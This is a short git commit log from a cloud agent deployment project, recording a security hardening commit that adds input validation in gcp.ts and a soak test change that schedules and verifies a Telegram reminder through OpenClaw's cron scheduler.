7278638a31
security: validate localPath in uploadFile() and harden runServer() in gcp.ts (#2524)
Fixes #2521 - Add path traversal and argument injection protection for localPath
Fixes #2522 - Add validation for cmd parameter before SSH execution

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-12 04:50:56 -04:00
Ahmed Abushagur
5b5e7d4706
test: add cron-triggered Telegram reminder to soak test (#2519)
* test: add cron-triggered Telegram reminder to soak test

Tests OpenClaw's ability to stay alive and execute scheduled tasks.
Installs a one-shot cron on the VM before the 1h soak wait that sends
a Telegram message at ~55 min, then verifies the message was sent
after the wait completes. Also moves Telegram config injection before
the soak wait so the cron can use the bot token immediately.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* test: use OpenClaw's cron scheduler instead of system crontab

Replaces the raw system cron approach with OpenClaw's built-in cron
scheduler (`openclaw cron add`). This properly tests that OpenClaw's
gateway stays alive after 1 hour and can execute scheduled tasks.

The test now:
1. Injects Telegram config + schedules an OpenClaw cron job (--at +55min)
2. Waits 1 hour (soak)
3. Verifies the job fired via `openclaw cron runs` and `openclaw cron list`

Uses --delete-after-run for one-shot semantics. Verification checks both
the run history and the auto-deletion as proof of execution.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* test: verify cron message on Telegram side via forwardMessage

Instead of trusting OpenClaw's self-reported cron status, we now verify
the message actually exists in the Telegram chat:

1. Extract message_id from OpenClaw's cron execution logs (tries
   `openclaw cron runs`, then ~/.openclaw/cron/ directory)
2. Call Telegram's forwardMessage API with that message_id
3. If Telegram can forward it → message EXISTS in the chat (proof
   from Telegram itself, not OpenClaw)

This catches cases where OpenClaw reports success but the message
never actually reached Telegram.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: address security review findings in soak test

- Add validate_positive_int() and validate SOAK_WAIT_SECONDS +
  SOAK_CRON_DELAY_SECONDS at startup (prevents command injection via
  crafted env vars)
- Validate TELEGRAM_TEST_CHAT_ID is numeric in soak_validate_telegram_env
- Use per-app marker file /tmp/.spawn-cron-scheduled-${app} to avoid
  race conditions when multiple soak tests run on the same VM

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-12 04:49:42 -04:00